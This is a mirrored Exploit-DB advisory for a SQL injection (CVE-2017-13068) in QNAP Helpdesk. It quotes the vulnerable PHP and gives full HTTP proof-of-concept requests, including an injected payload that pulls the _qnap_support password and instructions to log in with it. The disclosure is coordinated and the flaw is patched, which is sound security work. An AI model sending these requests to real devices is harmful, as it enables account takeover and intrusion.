bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44060.md
Offensive Security e630f8c249 DB: 2018-02-16 
45 changes to exploits/shellcodes

Cisco ASA - Crash PoC
Cisco ASA - Crash (PoC)

GNU binutils 2.26.1 - Integer Overflow (POC)
GNU binutils 2.26.1 - Integer Overflow (PoC)
K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read
Linux Kernel - 'AF_PACKET' Use-After-Free
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service
Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)
Microsoft Edge Chakra JIT - Memory Corruption
Microsoft Edge Chakra JIT - ImplicitCallFlags Checks Bypass
Microsoft Edge Chakra JIT - Array Type Confusion via InitProto Instructions
Microsoft Edge Chakra JIT - 'Array.prototype.reverse' Array Type Confusion
Microsoft Edge Chakra JIT - 'NewScObjectNoCtor' Array Type Confusion
Microsoft Edge Chakra JIT - 'LdThis' Type Confusion
Pdfium - Pattern Shading Integer Overflows
Pdfium - Out-of-Bounds Read with Shading Pattern Backed by Pattern Colorspace
Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow
Hotspot Shield - Information Disclosure
Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation
Nitro Pro PDF - Multiple Vulnerabilities
Odoo CRM 10.0 - Code Execution
Dashlane - DLL Hijacking

LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation
Trustwave SWG 11.8.0.27 - SSH Unauthorized Access
Ichano AtHome IP Cameras - Multiple Vulnerabilities
Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution
Ikraus Anti Virus 2.16.7 - Remote Code Execution
McAfee Security Scan Plus - Remote Command Execution
OrientDB - Code Execution
360 Total Security - Local Privilege Escalation
HPE Intelligent Management Center (iMC) 7.2 (E0403P10) - Code Execution
Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution
iBall WRA150N - Multiple Vulnerabilities
GitStack - Unauthenticated Remote Code Execution
Monstra CMS - Remote Code Execution
Ametys CMS 4.0.2 - Unauthenticated Password Reset
DblTek - Multiple Vulnerabilities
FiberHome - Directory Traversal
PHP Melody 2.7.3 - Multiple Vulnerabilities
Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure
Horde Groupware 5.2.21 - Unauthorized File Download
QNAP HelpDesk < 1.1.12 - SQL Injection
Hanbanggaoke IP Camera - Arbitrary Password Change
McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution
Sophos XG Firewall 16.05.4 MR-4 - Path Traversal
Cisco DPC3928 Router - Arbitrary File Disclosure
IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities
Geneko Routers - Unauthenticated Path Traversal
Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
2018-02-16 05:01:50 +00:00

4.8 KiB
Raw Blame History

Vulnerability Summary

The following advisory describes a SQL injection found in QTS Helpdesk versions 1.1.12 and earlier.

QNAP helpdesk: “Starting from QTS 4.2.2 you can use the built-in Helpdesk app to directly submit help requests to QNAP from your NAS. To do so, ensure your NAS can reach the Internet, open Helpdesk from the App Center, and create a new Help Request. Helpdesk will automatically collect and attach NAS system information and system logs to your request, and you can provide other information such as the steps necessary to reproduce the error, the error message and screenshots so we can identify the problem faster.”

Credit

An independent security researcher, Kacper Szurek, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.

Vendor response

QNAP has released patches to address this vulnerability.

For more information: https://www.qnap.com/en/security-advisory/nas-201709-29

CVE: CVE-2017-13068

Vulnerability details

In order to trigger the vulnerability, a user needs to have Remote Support option enabled.

User controlled input is not sufficiently sanitized, by sending a CLI request to www/App/Controllers/Cli/SupportUtils.php an attacker can trigger an SQL injection and receive the password of the _qnap_support user.

Code which is responsible for checking permissions is commented:

// if (strtolower(php_sapi_name()) !== 'cli') {
//  $this->fileLogModel->logError('You can not use this function via web.', __FILE__);
//  die('You can not use this function via web. File: ' . __FILE__);
// }

We can access registerExternalLog which executes setExternalLog

public function registerExternalLog($appName, $appLogPath)
{
 $supportUtils = $this->model('SupportUtilsModel');

if (file_exists($appLogPath) && is_dir($appLogPath)) {
 printf("\r\n[%s] You should assign a log file, not folder.\r\n", colorize($appName, 'ERROR'));
} else if (file_exists($appLogPath) && !is_dir($appLogPath)) {
 if ($supportUtils->setExternalLog($appName, $appLogPath)) {
  printf("\r\n[%s] Log path %s was registered.\r\n", colorize($appName, 'SUCCESS'), colorize($appLogPath, 'SUCCESS'));
 } else {
  printf("\r\n[%s] Register external log failed.\r\n", colorize($appName, 'ERROR'), colorize($appLogPath, 'ERROR'));
 }
 } else {
 printf("\r\n[%s] Log file not found.\r\n", colorize($appName, 'ERROR'));
}
}

We can see the SQL injection in $appName in www/App/Models/SupportUtilsModel.php

public function setExternalLog($appName, $appLogPath)
{
 $now = time();
 $queryStr = "INSERT INTO external_log (appName, appLogPath, createdTime) VALUES ('$appName', '$appLogPath', '$now')";
 $rowCount = 0;

 try {
  $rowCount = $this->db->queryNoneResult($queryStr);
 } catch (\Exception $e) {
  return false;
 }

 return $rowCount;
}

Proof of Concept

First we need to check if the remote support is enabled on victims machine. We can check by sending the following CLI request:

CLI /apps/qdesk/cli/supportutils/upload/a HTTP/1.1
Host: 192.168.1.55:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close

If its not enable “Remote session is not enabled” text will be displayed.

Now we can trigger the SQL Injection by sending the following request:

CLI /apps/qdesk/cli/supportutils/applog/reg/bb',(SELECT/*a*/cfgValue/*a*/FROM/*a*/configuration/*a*/WHERE/*a*/cfgKey='tempPw'),'149881968')/*/::/etc/passwd HTTP/1.1
Host: 192.168.1.55:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close

The server will respond with

CLI /apps/qdesk/cli/supportutils/applog/list HTTP/1.1
Host: 192.168.1.55:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close

And the output should look like:

| App Name | Log Path | Create Time |
| bb | BqGgseHn <-- this is password | 1974-10-02 01:52:48 |

Now you can login as: Login: _qnap_support Password: Obtained from SQL Injection